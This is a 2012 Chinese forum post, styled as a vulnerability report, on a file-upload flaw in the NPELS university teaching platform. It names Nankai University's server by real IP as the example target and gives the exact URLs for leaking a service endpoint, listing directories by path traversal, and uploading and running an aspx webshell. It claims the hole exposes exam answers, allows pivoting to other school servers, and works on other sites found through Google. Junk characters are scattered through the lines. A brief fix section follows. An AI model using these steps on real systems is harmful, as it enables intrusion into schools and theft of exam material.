找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2199|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中' z+ u) z: f$ T$ K
0 Z, ], b. I$ Q, J0 _; M& M+ O
详细说明:
# |5 p5 W& ], L , i: n) W% L# `
以南开大学的为例:
3 m" @& _1 J9 [' J/ S' F+ dhttp://222.30.60.3/NPELS: t1 f, p8 A: x/ _* S
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址! Q1 d- ?: n( M+ u# r* @" t; V
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
; g- }  w3 F( A6 t1 J<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# Z+ R2 k1 V* Y4 b/ j( M% L</setting>. ~! ^( H7 z" y8 I% [* w/ T
及版本号$ `3 ?5 K# J# V$ S8 {. P3 d
<add key="TVersion" value="1, 0, 0, 2187">
, s2 N0 D: D2 I</add>' }3 X" D, ?0 E6 m. l( q0 B. o8 @
直接访问: a/ i' |8 r4 x' B% {+ W: m
http://222.30.60.3/NPELS/CommonService.asmx0 ]8 R5 \1 s* d$ p! W
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
4 Q- ?# O5 A% P, @5 J2 K% ?http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
# |! i; T2 U  L% |* j9 C4 o进一步列目录(返回的网页很大,可以直接 wget 下来)
0 n5 ?$ {/ Q. F0 G& Lhttp://222.30.60.3/NPELS/CommonS ... List?version=../../; Q% C$ k$ G3 {" E* k
7 G& T9 p# x* G  X" V
发现" |' T7 Z0 ]8 g1 ]! }5 L! h
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
$ n7 o: G* {1 \3 Z可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头) U: g9 o/ f3 a2 `% M
上传后继续列目录找到木马地址直接访问即可
- x2 }$ z: M' ^+ K7 h$ d( J ) l1 L- B  |; _9 N- e9 R
OOXX
( o; _6 @, P% r2 x* `
9 S6 ]1 x3 f$ {: B/ uGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法0 b9 S  D$ w8 r6 _, i
漏洞证明:+ H. o4 O5 W+ F5 n4 n0 h& {$ T. R

4 E2 y8 F- I/ o/ t2 p列目录:
( w/ |* b5 M0 B" k' r7 z2 Q0 vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../& X4 r5 }$ k) ^& A
文件上传:# a# b, e0 B% \8 b; s  ^3 P
http://222.30.60.3/npelsv/editor/editor.htm( p& v; J" a  D1 A! }% c& {$ y
9 r' p  S7 @% ~( Z7 m7 n
上传木马:
: h$ n4 K; N5 w' A! l! c) E9 `$ qhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx0 ~& N* ?  W' L/ c6 r$ I2 B
& k. a, t/ @! Q" }+ W3 \# d3 i( e
修复方案:
2 G( |' B; Y9 t0 j好像考试系统必须使用 CommonService.asmx1 O9 q5 l# a0 \
最好配置文件加密或者用别的方式不让它泄露出来0 f6 t  x# x" b. p
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​1 q7 d: [: K6 d% m& e4 B) N; R  O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表